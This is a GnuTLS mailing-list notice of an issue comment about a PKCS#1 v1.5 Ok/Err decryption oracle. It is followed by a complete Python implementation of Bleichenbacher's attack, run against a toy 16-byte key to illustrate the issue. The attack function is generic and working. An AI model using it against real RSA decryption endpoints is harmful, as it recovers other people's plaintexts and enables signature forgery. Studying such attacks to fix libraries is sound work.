[gnutls-devel] GnuTLS | Behavioral PKCS#1 v1.5 decryption oracle (Ok/Err bit) (#1901)

Read-only notification of GnuTLS library development activities gnutls-devel at lists.gnutls.org
Thu Jun 11 07:03:01 CEST 2026

Mark Esler commented: https://gitlab.com/gnutls/gnutls/-/work_items/1901#note_3444450399


Cheers for the triage @dueno and @tomato42 🙏

And nice fix on the timing channel in #1050. (Alicja, I'd filed this before we spoke and hadn't seen 1050 at the time, overlap's on me.)

Agree that it can be used safely. If an attacker has access to the behavioral (Ok/Err) oracle, against a 4096-bit key it takes ~40k decrypt queries to recover a plaintext and ~110k to forge a signature.

Enhancement + removal sounds good to me.


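The attack behind the query counts quoted above, as an added example that is not part of the thread and not GnuTLS code. It is a direct implementation of Bleichenbacher's 1998 algorithm (steps 2a, 2b, 2c, 3 and 4, without the optional blinding step) driven by a toy decryption endpoint that answers one bit per ciphertext. Oracle, bleichenbacher, pkcs1_unpad and demo are this example's own names; the key is built from two published primes and is only 16 bytes long so that a run takes seconds. That short key also makes one caveat visible: Oracle(strict=True) returns the real Ok/Err result of the unpad routine (at least eight non-zero padding bytes, then a 0x00 separator), while strict=False answers only whether the block starts with 00 02. Both drive the same attack, because a strict Ok is always a prefix Ok, but on a 16-byte block a conforming value contains a separator only about 1 time in 45, so the strict run needs roughly 45 times the queries. At 4096 bits a conforming block contains a separator well over 80 percent of the time, which is why the real Ok/Err bit is nearly as cheap to exploit there as the textbook prefix oracle. demo() therefore uses the prefix oracle by default.

```python
"""Toy Bleichenbacher attack on a behavioural (Ok/Err) PKCS#1 v1.5 oracle.
Added example, not GnuTLS code; the 16-byte key exists only to make the run
take seconds and must never be used for anything real."""
import random

rng = random.Random(1901)  # fixed seed: reproducible padding and run
# Toy key from two published primes (largest below 2**64 and below 2**63).
P, Q, E = 2**64 - 59, 2**63 - 25, 65537
KEY = (P * Q, E, pow(E, -1, (P - 1) * (Q - 1)))


def pkcs1_pad(msg, k):   # EME-PKCS1-v1_5 encoding, needs len(msg) <= k - 11
    ps = bytes(rng.randrange(1, 256) for _ in range(k - 3 - len(msg)))
    return b"\x00\x02" + ps + b"\x00" + msg


def pkcs1_unpad(em):
    """(ok, msg) as a caller sees it; `ok` is the bit the attacker learns."""
    if len(em) < 11 or em[:2] != b"\x00\x02":
        return False, None
    sep = em.find(b"\x00", 2)
    if sep < 10:  # no separator, or fewer than 8 non-zero padding bytes
        return False, None
    return True, em[sep + 1:]


class Oracle:
    """Decryption endpoint that answers one bit per submitted ciphertext."""
    def __init__(self, key, strict=True):
        self.n, self.e, self.d = key
        self.k = (self.n.bit_length() + 7) // 8
        self.strict, self.queries = strict, 0

    def __call__(self, c):
        self.queries += 1
        em = pow(c, self.d, self.n).to_bytes(self.k, "big")
        if self.strict:                  # real Ok/Err result of pkcs1_unpad
            return pkcs1_unpad(em)[0]
        return em[:2] == b"\x00\x02"     # Bleichenbacher's "00 02" prefix model


def bleichenbacher(oracle, c0):
    """Recover the padded plaintext m of c0 from oracle answers alone."""
    n, e, B = oracle.n, oracle.e, 1 << (8 * (oracle.k - 2))
    ceil = lambda a, b: -(-a // b)
    conforming = lambda s: oracle(c0 * pow(s, e, n) % n)  # m*s mod n in [2B,3B)?
    M = [(2 * B, 3 * B - 1)]             # every conforming plaintext lies here
    s = ceil(n, 3 * B)                   # step 2a: first s with c0*s^e conforming
    while not conforming(s):
        s += 1
    while True:
        new = []                         # step 3: narrow each interval using s
        for a, b in M:
            for r in range(ceil(a * s - 3 * B + 1, n), (b * s - 2 * B) // n + 1):
                lo, hi = max(a, ceil(2 * B + r * n, s)), min(b, (3 * B - 1 + r * n) // s)
                if lo <= hi:
                    new.append((lo, hi))
        M = []
        for lo, hi in sorted(new):       # merge touching or overlapping intervals
            if M and lo <= M[-1][1] + 1:
                M[-1] = (M[-1][0], max(M[-1][1], hi))
            else:
                M.append((lo, hi))
        if len(M) == 1 and M[0][0] == M[0][1]:
            return M[0][0]               # step 4: m found (no blinding, s0 = 1)
        if len(M) > 1:                   # step 2b: several intervals, scan s upward
            s += 1
            while not conforming(s):
                s += 1
        else:                            # step 2c: one interval, jump ahead via r
            a, b = M[0]
            r = ceil(2 * (b * s - 2 * B), n)
            while True:
                lo, hi = ceil(2 * B + r * n, b), (3 * B - 1 + r * n) // a
                s = next((t for t in range(lo, hi + 1) if conforming(t)), None)
                if s is not None:
                    break
                r += 1


def demo(msg=b"key!", strict=False):
    """Encrypt msg under KEY, then recover it through the oracle only."""
    oracle = Oracle(KEY, strict=strict)
    c0 = pow(int.from_bytes(pkcs1_pad(msg, oracle.k), "big"), KEY[1], KEY[0])
    ok, recovered = pkcs1_unpad(bleichenbacher(oracle, c0).to_bytes(oracle.k, "big"))
    return (recovered if ok else None), oracle.queries


if __name__ == "__main__":
    plaintext, queries = demo()
    print(f"recovered {plaintext!r} after {queries} oracle queries")
```

Run it with python3 and it prints the recovered plaintext and the number of oracle queries spent; pass strict=True to demo() to watch the real Ok/Err bit do the same job far more slowly on this key size. Note that the attacker never touches the private key: all it needs is that the caller can tell the Ok case from the Err case, and that distinction (in the return value and in timing alike) is what a fix has to take away.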